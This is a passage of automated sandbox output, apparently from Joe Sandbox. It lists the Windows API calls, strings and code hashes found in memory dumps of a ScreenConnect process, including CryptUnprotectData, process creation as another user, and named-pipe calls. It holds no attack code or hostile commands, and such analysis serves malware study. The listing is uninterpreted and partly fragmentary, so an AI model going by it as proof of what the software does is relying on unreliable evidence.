                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: 797220cf6beea8cc3b491e4c1df7d939dcbb7eb91d120972ecb1487610d00ba3
                                                                                                              • Instruction ID: a2034e3a24101f8582ea12444663455f2237ad1c6ecf158119f48b4d46c13c23
                                                                                                              • Opcode Fuzzy Hash: 797220cf6beea8cc3b491e4c1df7d939dcbb7eb91d120972ecb1487610d00ba3
                                                                                                              • Instruction Fuzzy Hash: 45413576900209DFCF10CFA9C884ADEBBF5FF48310F15852AE958AB250D735A956CF90
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 4569f797247156021e6fa34acb0dce54010c5e58e1d481cd6ad101b5f833d41d
                                                                                                              • Instruction ID: 57a8e39aa9103a10b072fa02299701e46a7dd4a6edcb4bb367db4006f7b86458
                                                                                                              • Opcode Fuzzy Hash: 4569f797247156021e6fa34acb0dce54010c5e58e1d481cd6ad101b5f833d41d
                                                                                                              • Instruction Fuzzy Hash: 1831CC768083999FCB01DFA8C850BDEBFF0EF49324F19408AE954AB252C3349449CFA5
                                                                                                              APIs
                                                                                                              • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04F80D64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: 03e2a05e8acdf0040ce415e3d5f1350db5877e67382517b0d15774fe767a504f
                                                                                                              • Instruction ID: 83789b499d93d4774bc4e8c210f50b664af593d0cc4523320d098832e4256f7e
                                                                                                              • Opcode Fuzzy Hash: 03e2a05e8acdf0040ce415e3d5f1350db5877e67382517b0d15774fe767a504f
                                                                                                              • Instruction Fuzzy Hash: 023103B2800248DFCB10DF9AD888A8EBFF5BF48310F15C059E918AB221D775A559CF51
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 21f2b5a7c7b965b233e2a20bf7ef180143febb7503b459a54c61e57cb2ed6de0
                                                                                                              • Instruction ID: 791f86c186925c242c2a465e5431fd305d2843ac0b898f6df61ee1fc4ff2f1c6
                                                                                                              • Opcode Fuzzy Hash: 21f2b5a7c7b965b233e2a20bf7ef180143febb7503b459a54c61e57cb2ed6de0
                                                                                                              • Instruction Fuzzy Hash: 432153B6800249DFCF10CF99D844BEEBBF4EB48320F10841AEA18A7201D379A955DFA5
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: b5e447d07de298789deaacaf507db6ce160337f7f6f41d5cd2a060d57157108e
                                                                                                              • Instruction ID: 25d798aa9c6068d736ce4fb2dd0c0ec4b390914521cd8c42003d789aa269ee7f
                                                                                                              • Opcode Fuzzy Hash: b5e447d07de298789deaacaf507db6ce160337f7f6f41d5cd2a060d57157108e
                                                                                                              • Instruction Fuzzy Hash: 312142B280024ADFCF10CF99D845BDEBBB4EB48320F10841AEA18A7211C339A555DFA1

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u$ ~u$#Pon^$3Pon^$CPon^$SPon^$sPon^
                                                                                                              • API String ID: 0-1467734542
                                                                                                              • Opcode ID: b924077016c8223671bc52c8ea78b11d7bedae37ecdead9f739c21d739a0d2c2
                                                                                                              • Instruction ID: 373e8e377499e71452bbc8f699b9ddbaa944e5c257e65acc97fb92a424ba1216
                                                                                                              • Opcode Fuzzy Hash: b924077016c8223671bc52c8ea78b11d7bedae37ecdead9f739c21d739a0d2c2
                                                                                                              • Instruction Fuzzy Hash: DE716C34B01201DBE719EB75D85466E7BA2EF85304B158A2CD50AEB391EF75FD0A8B80

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u$#Pon^$3Pon^$CPon^$sPon^
                                                                                                              • API String ID: 0-3517483127
                                                                                                              • Opcode ID: eed2f4ca27a890d3c5848b3be96bb558cfcae59be67f8d8785df9b3765b343db
                                                                                                              • Instruction ID: 3a0e5eb819a82e43d7446000e427e2ef2a9420683c04b77cf23e3db35d63c529
                                                                                                              • Opcode Fuzzy Hash: eed2f4ca27a890d3c5848b3be96bb558cfcae59be67f8d8785df9b3765b343db
                                                                                                              • Instruction Fuzzy Hash: F451AD34A01200CBE719EF75D85456E7BE2EF85304B158A2DD50AEB3A1EF74FD0A8B80

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$c!
                                                                                                              • API String ID: 0-2170482832
                                                                                                              • Opcode ID: d083b203a44613239ae878f654c759e0aa1b789cc85d9554aefcf7b2acd225c0
                                                                                                              • Instruction ID: fd2f939bc911a4cc485c25d0652c1864c7c070a0355dbb5a06555a194054dc56
                                                                                                              • Opcode Fuzzy Hash: d083b203a44613239ae878f654c759e0aa1b789cc85d9554aefcf7b2acd225c0
                                                                                                              • Instruction Fuzzy Hash: AAB18035A00206DFDB15EF68D45599EBBF2EF85320B18856DE519AB361DF31EC068F80

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u
                                                                                                              • API String ID: 0-3557116590
                                                                                                              • Opcode ID: f8e77951d344de54f72b526789abf533c08a39bd8b5a8e755fdf0f819dd6ab60
                                                                                                              • Instruction ID: 73cb75ac8333c65a2b73b7c9d7a813eda7b967e698ab28636a7552ca99fa1c08
                                                                                                              • Opcode Fuzzy Hash: f8e77951d344de54f72b526789abf533c08a39bd8b5a8e755fdf0f819dd6ab60
                                                                                                              • Instruction Fuzzy Hash: 5981603060070ADFE719EF78D45569EBBE2FF84300B048A6CD14A9B755EB75AA088BD4

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ;Zk$fon^
                                                                                                              • API String ID: 0-3809777597
                                                                                                              • Opcode ID: b3d5552f6b09fa31aeb7795134efe8f846f86b6119ab5dbfe3c8440137a1b1e3
                                                                                                              • Instruction ID: 0b7559f0025bf7eecfbc75978dab009094839d9c1953046f909380f721306c7b
                                                                                                              • Opcode Fuzzy Hash: b3d5552f6b09fa31aeb7795134efe8f846f86b6119ab5dbfe3c8440137a1b1e3
                                                                                                              • Instruction Fuzzy Hash: 7471E974E002298FDB68DF69C854BADB7B2FB88300F1485A9D50DE7354DB70AE859F90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0u
                                                                                                              • API String ID: 0-3203441087
                                                                                                              • Opcode ID: 99b1b417cb4a98d3a7286055c7694d703f05ce148fd3ff14d2923b4c59e93763
                                                                                                              • Instruction ID: 3d17b1f91e35e01af662bd2d77c2cd64b610ca28c2d647869ee5a06220e9b87e
                                                                                                              • Opcode Fuzzy Hash: 99b1b417cb4a98d3a7286055c7694d703f05ce148fd3ff14d2923b4c59e93763
                                                                                                              • Instruction Fuzzy Hash: D6423C34A00619CFDB54EF68D858AADBBB2FF89300F1146D9E509AB365DB31AD85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 817544b3369e012f086227e0fd61590394de9b4a73d4ea613b1eb47e4bd30da7
                                                                                                              • Instruction ID: 416c1c54fd65807e9de2c5568848e48a862c687015e2998b4ced6dc1a9afc46c
                                                                                                              • Opcode Fuzzy Hash: 817544b3369e012f086227e0fd61590394de9b4a73d4ea613b1eb47e4bd30da7
                                                                                                              • Instruction Fuzzy Hash: 85518E71A006058FDB24CF69D880AAEBBF1FF88320F15892ED55AD7651D734E945CBA0
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 04F8F7DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 5fcc3986b2967e57014e7a28db4037615523d0b6468620935a9b6595776f0623
                                                                                                              • Instruction ID: 8a384f55ddf0da57c6f99ad8d696d52e4be0332e628555528702b02f3350d1c6
                                                                                                              • Opcode Fuzzy Hash: 5fcc3986b2967e57014e7a28db4037615523d0b6468620935a9b6595776f0623
                                                                                                              • Instruction Fuzzy Hash: E85107B1D00249DFDB10DFA9C985B9EBBF1FB48304F248129E818AB251D7799846CFA1
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 04F8F7DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 56b52b8155c8c54845ca8461b19a3a98e070df05464d03528e8268ca3da0b1a0
                                                                                                              • Instruction ID: 17d803ab390b640b5d88824bd88bc205540d39a45574d60d7dbb72e9e7d1eb44
                                                                                                              • Opcode Fuzzy Hash: 56b52b8155c8c54845ca8461b19a3a98e070df05464d03528e8268ca3da0b1a0
                                                                                                              • Instruction Fuzzy Hash: 3C512871D00249DFEB10DFA9C985B9EBBF1FB48304F14812DE818AB251D775A846CF95
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: c"on^
                                                                                                              • API String ID: 0-2939423657
                                                                                                              • Opcode ID: e70fd32f1ca4f12e11bba248fba22916902ac6ca6a7e12dbc899b6a857379e09
                                                                                                              • Instruction ID: 90c869f4f690525e4704447bcb29b7052414c100c8f9baf321d6746c6b551b3f
                                                                                                              • Opcode Fuzzy Hash: e70fd32f1ca4f12e11bba248fba22916902ac6ca6a7e12dbc899b6a857379e09
                                                                                                              • Instruction Fuzzy Hash: 80E17D34B01206DFDB14DF69C454AAE77B2EF88314F148A68D61AEB364DF70E985CB80
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 04F819BF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: ccd77e7663cc41aa0c76f2c31adee55695d44999e2119d93204920f46ae3cbb6
                                                                                                              • Instruction ID: a3258b4f81a5a46383f34d64837f3cc6c72824525bdffba99e685b61afa8f8b2
                                                                                                              • Opcode Fuzzy Hash: ccd77e7663cc41aa0c76f2c31adee55695d44999e2119d93204920f46ae3cbb6
                                                                                                              • Instruction Fuzzy Hash: 3441357690020ADFCF10CFA9D884ADEBBF1FF48310F15852AE958AB250D735A956CF90
                                                                                                              APIs
                                                                                                              • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04F80D64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: 12f3f8af2399fa64da282e56b0960222404433812a69858ce6287d8830b7878f
                                                                                                              • Instruction ID: b7234aa4886595b6a77d853a15ba05a595d3fa68aca9056ed7e845719602bfc8
                                                                                                              • Opcode Fuzzy Hash: 12f3f8af2399fa64da282e56b0960222404433812a69858ce6287d8830b7878f
                                                                                                              • Instruction Fuzzy Hash: F7311476801248EFCB10DF9AD488A8EBFF5FF48310F158019E918AB221D775A51ACF61
                                                                                                              APIs
                                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0545657E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProcessSession
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779259828-0
                                                                                                              • Opcode ID: 0d84b47498ef5a97a317fe84e6eb3d803ffd7b51c925289625d3db48b74c15b8
                                                                                                              • Instruction ID: 8644243a62beaa9734e7ad723435e5d8885ff3846989371c453d2415a157cf7e
                                                                                                              • Opcode Fuzzy Hash: 0d84b47498ef5a97a317fe84e6eb3d803ffd7b51c925289625d3db48b74c15b8
                                                                                                              • Instruction Fuzzy Hash: 912123B18003499FCB10CFAAD844B9EBBF4EB89720F11846AE858A7251D378A545CFA1
                                                                                                              APIs
                                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 04F81FC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              • Opcode ID: 6371df550ea4be73a9d86c4c5e2566ff0ce487372bfda24b764bde7a50f943cc
                                                                                                              • Instruction ID: 636e09fd2fe7bc123671fd3686343c70f35ec0fb9e802768f88a1bc7717881b7
                                                                                                              • Opcode Fuzzy Hash: 6371df550ea4be73a9d86c4c5e2566ff0ce487372bfda24b764bde7a50f943cc
                                                                                                              • Instruction Fuzzy Hash: 0F2125B1D04218DFCB14DFA9D498BDEBBF4AF48700F15805AE809AB340DB75A906CFA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: f52257458e2442f7a3aacb090a11496fd13afab7ddc81081104fd6b18c8b7801
                                                                                                              • Instruction ID: ab637568eeb1bb45fb6e6a73ba20b6b4f28830a5157894fc553a5e3786219d77
                                                                                                              • Opcode Fuzzy Hash: f52257458e2442f7a3aacb090a11496fd13afab7ddc81081104fd6b18c8b7801
                                                                                                              • Instruction Fuzzy Hash: 46D16078A00705DFCB04DF68C894A9AB7F6FF49314B158699E919AB365DB30EC85CF80
                                                                                                              APIs
                                                                                                              • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0545649D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumProcesses
                                                                                                              • String ID:
                                                                                                              • API String ID: 84517404-0
                                                                                                              APIs
                                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 04F81FC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              APIs
                                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 04F8453F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NamedPipeWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3146367894-0
                                                                                                              APIs
                                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 04F8453F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NamedPipeWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3146367894-0
                                                                                                              APIs
                                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0545657E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProcessSession
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779259828-0
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: d4657091e74b9d164fe5ac7917f4a50bee5b14a66e22067fbd390bdc6b656829
                                                                                                              • Instruction ID: 39ac3c8ce1a340a32460564708ef6fc1c081f19fdeb8da5af96d0d6c02f58e19
                                                                                                              • Opcode Fuzzy Hash: d4657091e74b9d164fe5ac7917f4a50bee5b14a66e22067fbd390bdc6b656829
                                                                                                              • Instruction Fuzzy Hash: 0B2125715083848FEB06DB6888355ADBFF6DF8321070980EBC105EB2A3DB359C0587A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: 05906cf8c919ee547452c68f23b80a95abb961e979546daec1a1ace32097e9e5
                                                                                                              • Instruction ID: d2299b7bc0847df79494c059ed9fe209609fc17f92b8baa683769b67beeb141c
                                                                                                              • Opcode Fuzzy Hash: 05906cf8c919ee547452c68f23b80a95abb961e979546daec1a1ace32097e9e5
                                                                                                              • Instruction Fuzzy Hash: 83118C793407108FD319EB28E954A2A77E2FF89711B1549ACEA068F3A1CB75FC45CB80
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: U
                                                                                                              • API String ID: 0-3372436214
                                                                                                              • Opcode ID: cc650b3f1005ebe3bad25cc30cacb9197cd7020870a28b648902535d9efda64a
                                                                                                              • Instruction ID: ebec32ade6ad60ee68744fe7098b357163da87d1b566ff4f1019e78253da81ff
                                                                                                              • Opcode Fuzzy Hash: cc650b3f1005ebe3bad25cc30cacb9197cd7020870a28b648902535d9efda64a
                                                                                                              • Instruction Fuzzy Hash: E001F262909389EFD702DBB8D89518C7FB0DF12201B1846DAD449CB292E6B01E09D742
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6480ca77d21af43fc3b4d8557bf9b6cb75a20ca45bef3f8119fbfdeb89cdc14d
                                                                                                              • Instruction ID: 77a3d31656418761137c188b2ba91fef1994e3ef968fc4449963aafe9a3cf7c0
                                                                                                              • Opcode Fuzzy Hash: 6480ca77d21af43fc3b4d8557bf9b6cb75a20ca45bef3f8119fbfdeb89cdc14d
                                                                                                              • Instruction Fuzzy Hash: 2C323935A00619CFDB54DF68C858AADBBB2FF88310F1186D9E509AB365DB31AD85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4415d27747163ae7af4470ba3e86ef0f36dd42d4469163e6df1bee8ee59c8bbc
                                                                                                              • Instruction ID: 0f4f896d5b530e1bcd9efb10cb7082f55b9b7ad3f5859c214cdfd38c0bbc4622
                                                                                                              • Opcode Fuzzy Hash: 4415d27747163ae7af4470ba3e86ef0f36dd42d4469163e6df1bee8ee59c8bbc
                                                                                                              • Instruction Fuzzy Hash: 6A323A34A01619CFDB54DF69C854AADBBF2FF89300F108699E909AB365DB31AD85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0c34485717b41259d1a8f5e066a66d9eeeda34a3151f03c9d379fbe280403b0
                                                                                                              • Instruction ID: fb5f360b08e5bb7f53f00f36bf9102ab8009701cf1ac1d2be8d28dfc6689663c
                                                                                                              • Opcode Fuzzy Hash: b0c34485717b41259d1a8f5e066a66d9eeeda34a3151f03c9d379fbe280403b0
                                                                                                              • Instruction Fuzzy Hash: 4EF12A74A01219CFDB24DF65C850B9DBBB1FF49304F20869AD909EB351EB71AA85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 161fe61dc68d86238b8bc93f6e230c55fb042dc1499529fb286f20480f2324ea
                                                                                                              • Instruction ID: 9da707fbdbbeab5e61cde9cbc2e0c6b7961dc1b529af313a91c9586854507275
                                                                                                              • Opcode Fuzzy Hash: 161fe61dc68d86238b8bc93f6e230c55fb042dc1499529fb286f20480f2324ea
                                                                                                              • Instruction Fuzzy Hash: 7A81F834B016059FDB14DFA8D884AAEB7B2FF8D314B148659E915EB365DB31EC02CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ac6bae25cba3d8796eb0f4154d420982ae9fa03d209578ff7db8db92cfdc347
                                                                                                              • Instruction ID: b53a9ae390fb5ff80c8789fb5ac823ae486ca7b427d112b164eb600a6356bdc3
                                                                                                              • Opcode Fuzzy Hash: 7ac6bae25cba3d8796eb0f4154d420982ae9fa03d209578ff7db8db92cfdc347
                                                                                                              • Instruction Fuzzy Hash: 3A718034B0420ACFEB15DB69C49466EF7F7EFC4210B1885A9D6199B395DF74EC018B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
